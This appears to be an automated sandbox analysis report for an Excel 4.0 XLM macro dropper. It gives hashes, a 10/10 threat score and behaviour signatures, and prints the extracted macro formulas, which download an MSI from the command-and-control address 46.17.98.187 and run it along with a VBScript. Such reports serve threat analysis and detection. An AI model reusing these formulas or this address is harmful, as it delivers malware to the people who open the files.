General

  • Target

    7395615d46a795b61c1ef4b0104ab4c4

  • Size

    6KB

  • Sample

    231222-gn21saabfm

  • MD5

    7395615d46a795b61c1ef4b0104ab4c4

  • SHA1

    43d91072f07b040d96aa69deb7e5b19c8f5c4b39

  • SHA256

    66fbe0d7434c7d9f1d801bdc2270a83b0fe575d1cae1066d480cbc5322ad5fbb

  • SHA512

    85ec2c75b5c2b0e18ce926a14729720f923ea8154edea2d60e097d1b041293a9a87e2fdfa2660a3d824da592a8dc4e39f5b8f8a83da45c73f0aa5a1a82d29f5c

  • SSDEEP

    192:NDSGuS+1aEOmmfRL8UhHFBFYutb98yu10s:NNuvwZ1FY8b98yuKs

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187

Attributes
  • formulas

    =EXEC("msiexec.exe") =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187","C:\ProgramData\uluculus.msi",0,0) =EXEC("wscript C:\ProgramData\start.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187

Targets

    • Target

      7395615d46a795b61c1ef4b0104ab4c4

    • Size

      6KB

    • MD5

      7395615d46a795b61c1ef4b0104ab4c4

    • SHA1

      43d91072f07b040d96aa69deb7e5b19c8f5c4b39

    • SHA256

      66fbe0d7434c7d9f1d801bdc2270a83b0fe575d1cae1066d480cbc5322ad5fbb

    • SHA512

      85ec2c75b5c2b0e18ce926a14729720f923ea8154edea2d60e097d1b041293a9a87e2fdfa2660a3d824da592a8dc4e39f5b8f8a83da45c73f0aa5a1a82d29f5c

    • SSDEEP

      192:NDSGuS+1aEOmmfRL8UhHFBFYutb98yu10s:NNuvwZ1FY8b98yuKs

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks